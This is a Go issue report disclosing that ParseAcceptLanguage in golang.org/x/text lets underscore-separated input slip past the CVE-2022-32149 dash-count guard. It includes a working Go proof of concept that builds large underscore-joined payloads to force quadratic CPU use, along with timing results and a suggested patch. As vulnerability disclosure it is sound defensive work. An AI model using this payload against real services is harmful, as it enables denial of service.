
x/text/language: ParseAcceptLanguage dash-count guard bypassed by '_' separator (incomplete CVE-2022-32149 fix) #79684


@tonghuaroot

What version of Go are you using (go version)?

go1.26.1 darwin/arm64 (also reproduces on linux/amd64)

What did you do?

golang.org/x/text/language.ParseAcceptLanguage has a dash-count guard added in CL 442235 / commit 434eadcdbc3b0256971992e8c70027278364c72c (the CVE-2022-32149 fix):

// language/parse.go:169 (HEAD 3ef517e623a4bfc08d6457f87d73afda7af7d8e1)
if strings.Count(s, "-") > 1000 {
    return nil, nil, errTagListTooLarge
}

The guard inspects only '-' (U+002D), but the scanner converts every '_' (U+005F) to '-' inside init:

// internal/language/parse.go:104-111
func (s *scanner) init() {
    for i, c := range s.b {
        if c == '_' {
            s.b[i] = '-'
        }
    }
    s.scan()
}

A payload built with '_' as the BCP 47 separator (e.g. POSIX en_US-style) bypasses the guard and re-triggers the O(N²) gobble path the original fix was meant to block.

Reproduction

go.mod:

module poc-xtext-pal-underscore
go 1.25.0
require golang.org/x/text v0.37.0

main.go:

package main

import (
    "fmt"
    "strings"
    "time"

    "golang.org/x/text/language"
)

func buildAttackPayload(nTokens int) string {
    parts := make([]string, 0, nTokens+1)
    parts = append(parts, "en")
    for i := 0; i < nTokens; i++ {
        parts = append(parts, "abcdefghi") // 9 chars, fails len <= 8
    }
    return strings.Join(parts, "_")
}

func main() {
    for _, n := range []int{1000, 10000, 50000, 100000} {
        p := buildAttackPayload(n)
        t0 := time.Now()
        _, _, err := language.ParseAcceptLanguage(p)
        fmt.Printf("attack n=%d  bytes=%d  -count=%d  _count=%d  elapsed=%v  err=%v\n",
            n, len(p), strings.Count(p, "-"), strings.Count(p, "_"), time.Since(t0), err)
    }

    // Baseline: same payload with '-' separator -> guard fires
    parts := make([]string, 0, 100001)
    parts = append(parts, "en")
    for i := 0; i < 100000; i++ {
        parts = append(parts, "abcdefghi")
    }
    baseline := strings.Join(parts, "-")
    t0 := time.Now()
    _, _, err := language.ParseAcceptLanguage(baseline)
    fmt.Printf("baseline    bytes=%d  -count=%d  elapsed=%v  err=%v\n",
        len(baseline), strings.Count(baseline, "-"), time.Since(t0), err)
}

Measured (go1.26.1 darwin/arm64, M1 Pro, golang.org/x/text v0.37.0):

attack n=1000    bytes=10002   -count=0  _count=1000   elapsed=134.96µs  err=language: tag is not well-formed
attack n=10000   bytes=100002  -count=0  _count=10000  elapsed=9.24ms    err=language: tag is not well-formed
attack n=50000   bytes=500002  -count=0  _count=50000  elapsed=411.15ms  err=language: tag is not well-formed
attack n=100000  bytes=1000002 -count=0  _count=100000 elapsed=1.35s     err=language: tag is not well-formed
baseline         bytes=1000002 -count=100000 elapsed=49.92µs err=tag list exceeds max length

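Identical input length and token count; the '_'-separated path is ~27,000x slower because the dash-count guard does not fire. go tool pprof shows 96% of time in runtime.memmove called from internal/language.(*scanner).gobble. Elapsed time grows much faster than input size (about 3.3x for the doubling from n=50000 to n=100000, and about 45x for the 5x step from n=10000 to n=50000), consistent with roughly O(N²) behavior.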
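To illustrate why memmove dominates, here is a simplified model rather than the library's code. It assumes each rejected subtag is removed by shifting the remaining tail of the buffer left with `copy`, one subtag at a time; `bytesMoved` is a hypothetical helper that counts the bytes copied under that assumption.

```go
package main

import (
	"fmt"
	"strings"
)

// bytesMoved models removing nTokens rejected subtags one at a time.
// Each removal shifts the rest of the buffer left with copy, and the
// function returns the total number of bytes copied.
// This is an illustrative model, not the x/text implementation.
func bytesMoved(nTokens, tokenLen int) int {
	b := []byte("en" + strings.Repeat("-"+strings.Repeat("a", tokenLen), nTokens))
	start := 2           // position just after "en"
	step := tokenLen + 1 // separator plus subtag
	moved := 0
	for len(b) > start {
		n := copy(b[start:], b[start+step:]) // shift the tail over the rejected subtag
		moved += n
		b = b[:start+n]
	}
	return moved
}

func main() {
	for _, n := range []int{1000, 2000, 4000} {
		fmt.Printf("n=%d bytes moved=%d\n", n, bytesMoved(n, 9))
	}
}
```

In this model the total is 5·n·(n−1) bytes for 9-character subtags, so doubling n roughly quadruples the work even though the input only doubles.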

What did you expect to see?

ParseAcceptLanguage rejects the input with errTagListTooLarge, because the number of separators the scanner sees after init (every '_' rewritten to '-') exceeds 1000.

What did you see instead?

ParseAcceptLanguage runs the O(N²) gobble path on the converted buffer and consumes ~1.35s of CPU per 1 MB request.

Suggested fix

Count '_' alongside '-' in the guard. The scanner aliases them, so the guard should too:

--- a/language/parse.go
+++ b/language/parse.go
@@ -166,8 +166,11 @@ func ParseAcceptLanguage(s string) (tag []Tag, q []float32, err error) {
         }
     }()

-    if strings.Count(s, "-") > 1000 {
-        return nil, nil, errTagListTooLarge
+    // The BCP 47 scanner aliases '_' to '-' in scanner.init
+    // (internal/language/parse.go); the guard must count both.
+    if strings.Count(s, "-")+strings.Count(s, "_") > 1000 {
+        return nil, nil, errTagListTooLarge
     }

A defense-in-depth amendment is to apply an analogous separator-count guard at language.Parse and language.MustParse, which feed the same scanner and have no guard at all today.

Routing note

I originally sent this to security@golang.org on 2026-05-25. On 2026-05-27 the Go Security Officers determined that it does not qualify as a security issue and invited a public upstream issue, which this is.

CC

@neild (Neal Patel) for visibility per the security-team thread.


Labels: NeedsInvestigation (someone must examine and confirm this is a valid issue and not a duplicate of an existing one).
